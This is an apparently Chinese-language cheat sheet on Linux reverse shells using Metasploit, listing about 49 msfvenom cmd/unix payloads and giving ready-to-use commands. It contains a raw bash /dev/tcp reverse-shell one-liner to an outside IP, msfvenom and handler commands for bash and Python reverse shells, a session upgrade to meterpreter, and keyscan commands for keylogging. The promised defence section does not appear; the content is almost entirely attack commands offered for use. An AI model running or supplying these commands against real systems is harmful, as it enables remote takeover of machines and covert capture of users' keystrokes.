linux反弹shell

linux系统40多种不同类型的反弹shell

1. linux比windows反弹shell的手法要多得多

2. msf的shellcode加载器msfvenom msfvenom -l payload |grep cmd/unix 如何查找自己需要的shellcode类型

3. 40多种linux反弹shell的手法

4. 反弹shell攻击的防御

msfvenom一句话反弹shell

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

cmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWK cmd/unix/bind_busybox_telnetd Listen for a connection and spawn a command shell via BusyBox telnetd cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent) cmd/unix/bind_jjs Listen for a connection and spawn a command shell via jjs cmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat cmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat cmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl cmd/unix/bind_r Continually listen for a connection and spawn a command shell via R cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby cmd/unix/bind_socat_udp Creates an interactive shell via socat cmd/unix/bind_stub Listen for a connection and spawn a command shell (stub only, no payload) cmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default. cmd/unix/generic Executes the supplied command cmd/unix/interact Interacts with a shell on an established socket connection cmd/unix/pingback_bind Accept a connection, send a UUID, then exit cmd/unix/pingback_reverse Creates a socket, send a UUID, then exit cmd/unix/reverse Creates an interactive shell through two inbound connections cmd/unix/reverse_awk Creates an interactive shell via GNU AWK cmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature. cmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL. cmd/unix/reverse_bash_udp Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/udp feature. cmd/unix/reverse_jjs Connect back and create a command shell via jjs cmd/unix/reverse_ksh Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default. cmd/unix/reverse_lua Creates an interactive shell via Lua cmd/unix/reverse_ncat_ssl Creates an interactive shell via ncat, utilizing ssl mode cmd/unix/reverse_netcat Creates an interactive shell via netcat cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat cmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections cmd/unix/reverse_perl Creates an interactive shell via perl cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL cmd/unix/reverse_python Connect back and create a command shell via Python cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design. cmd/unix/reverse_r Connect back and create a command shell via R cmd/unix/reverse_ruby Connect back and create a command shell via Ruby cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL cmd/unix/reverse_socat_udp Creates an interactive shell via socat cmd/unix/reverse_ssh Connect back and create a command shell via SSH cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option cmd/unix/reverse_stub Creates an interactive shell through an inbound connection (stub only, no payload) cmd/unix/reverse_tclsh Creates an interactive shell via Tclsh cmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default. tty/unix/interact Interacts with a TTY on an established socket connection

常用一句话反弹shell命令速查

linux cmd

1 2 3 4 5

handler -H 10.10.14.7 -P 6678 -p cmd/unix/reverse_bash msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.7 LPORT=6678 -f raw 0<&43-;exec 43<>/dev/tcp/192.168.123.123/6678;sh <&43 >&43 2>&43

python reverse

1 2 3 4

handler -H 192.168.123.123 -P 6688 -p cmd/unix/reverse_python msfvenom -p cmd/unix/reverse_python LHOST=192.168.123.123 LPORT=6688 -f raw

session -u $session-id

可以新建一个meterpreter类型的session。

得到meterpreter的session以后

1 2 3

keyscan_start keyscan_dump

可以进行键盘记录

参考资料

• https://gtfobins.github.io/gtfobins/jjs/#reverse-shell
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python
• msf unix/cmd/